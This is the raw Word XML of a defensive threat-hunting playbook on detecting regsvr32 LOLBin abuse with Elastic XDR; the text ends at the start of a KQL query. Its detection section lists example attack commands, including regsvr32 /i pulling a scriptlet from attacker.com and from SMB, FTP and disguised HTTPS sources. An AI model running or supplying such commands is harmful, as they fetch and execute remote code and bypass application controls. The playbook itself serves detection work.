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C098" w14:textId="0C395C5E" w:rsidR="0071548A" w:rsidRPr="00311278" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk220054198"/>
      <w:r w:rsidRPr="002429CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Hunting Playbook 1: </w:t>
      </w:r>
      <w:r w:rsidR="00E07FA9" w:rsidRPr="002429CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="002429CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">egsvr32 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002429CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LOLBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002429CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Abuse (Elastic XDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A17597" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00311278" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311278">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B28EAB0" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00311278" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:r w:rsidRPr="00311278">
        <w:t xml:space="preserve">Threat actors use </w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:t xml:space="preserve"> to perform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> malicious execution including</w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:t xml:space="preserve"> fileless remote code execution, bypass AppLocker, </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00406655">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>execution policies</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00311278">
        <w:t>, and AMSI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC02AB2" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:r w:rsidRPr="00311278">
        <w:t xml:space="preserve">Elastic XDR is used to detect and investigate this activity using </w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>process events</w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network telemetry</w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parent-child relationships</w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>timeline analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00311278">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6632B073" w14:textId="37949501" w:rsidR="0071548A" w:rsidRDefault="00C01ED1" w:rsidP="0071548A">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A8180D" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00311278" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311278">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hunt Classification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866"/>
      </w:tblGrid>
      <w:tr w:rsidR="0071548A" w14:paraId="1767D992" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68AF7041" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US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866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D725D08" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"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71548A" w14:paraId="32D29AAC" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06126B78" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Hunt Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BB17B44" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Threat Hunting – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>LOLBins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> / Fileless RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="17FF5FC7" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54849073" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CA66F0E" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="6CF9D72E" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B0A1A27" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D9A213D" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Regsvr32 abuse, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scriptlet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> execution, remote payload delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="7BA961AD" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47C0FE7D" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Data Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51EFE823" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Elastic XDR Process Events, Network Events, File Events, Analyzer View, Authentication Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C151752" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00311278" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402C66CD" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311278">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Preparation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866"/>
      </w:tblGrid>
      <w:tr w:rsidR="0071548A" w14:paraId="2BE0DC45" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0270A14A" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC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6866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35E84D0E" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC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Action in Elastic XDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="075D815D" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C6F06CD" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Define Hypothesis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A64C81A" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00F646C2" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F646C2">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>Threat actor may execute remote malicious scripts using regsvr32 → scrobj.dll → .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F646C2">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>sct</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F646C2">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> or may execute actual </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>dll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00610DC5">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>payload/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>malware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="6ADFB87A" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29388043" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Ensure Visibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="779D5C02" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00F646C2" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F646C2">
              <w:t xml:space="preserve">Confirm </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F1EE7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endpoint.events</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F1EE7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.process</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009F1EE7">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F1EE7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endpoint.events</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F1EE7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.network</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F646C2">
              <w:t xml:space="preserve"> are enabled in agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="23AF30CC" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23B514FC" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Identify Baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74F2DA57" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Determine normal regsvr32 script execution usage (usually </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
              </w:rPr>
              <w:t>zero</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in modern environments)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12EFB8E3" w14:textId="1E344964" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1E10D7" w14:textId="27237281" w:rsidR="0071548A" w:rsidRPr="005E575A" w:rsidRDefault="0071548A" w:rsidP="005E575A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E575A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Detection &amp; Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78C074" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00CF68B8" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF68B8">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF68B8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF68B8">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detect suspicious Regsvr32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF68B8">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SCT / COM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF68B8">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF68B8">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution (Critical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397BEC65" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left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>triggered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6228B8C1" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2596D">
        <w:t>regsvr32.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>i:http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>://attacker.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>payload.sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="000536E8">
        <w:t xml:space="preserve"> (Remote HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F44AAB1" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00D2596D" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2596D">
        <w:t>regsvr32.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>:\\192.168.1.10\share\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>script.sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000536E8">
        <w:t>(SMB protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18551554" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00D2596D" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2596D">
        <w:t>regsvr32.exe /s /u /n /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>i:ftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>://10.0.0.5/test.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000536E8">
        <w:t>(FTP protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2596D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132006DE" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00D2596D" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2596D">
        <w:t>regsvr32.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>i:C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>:\Users\Public\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>file.sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000536E8">
        <w:t>(Local SCT file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB433D6" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00D2596D" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2596D">
        <w:t>regsvr32.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>i:https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t>://github.com/payload.png</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2596D">
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00593B45">
        <w:t>(Masquerading extension over HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723573A1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2.1.1 Query KQL Elastic XDR</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8352" w:type="dxa"/>
        <w:tblInd w:w="828" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8352"/>
      </w:tblGrid>
      <w:tr w:rsidR="0071548A" w14:paraId="2CC38795" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:trPr>
          <w:trHeight w:val="58"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07A1CDFE" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.name :</w:t>
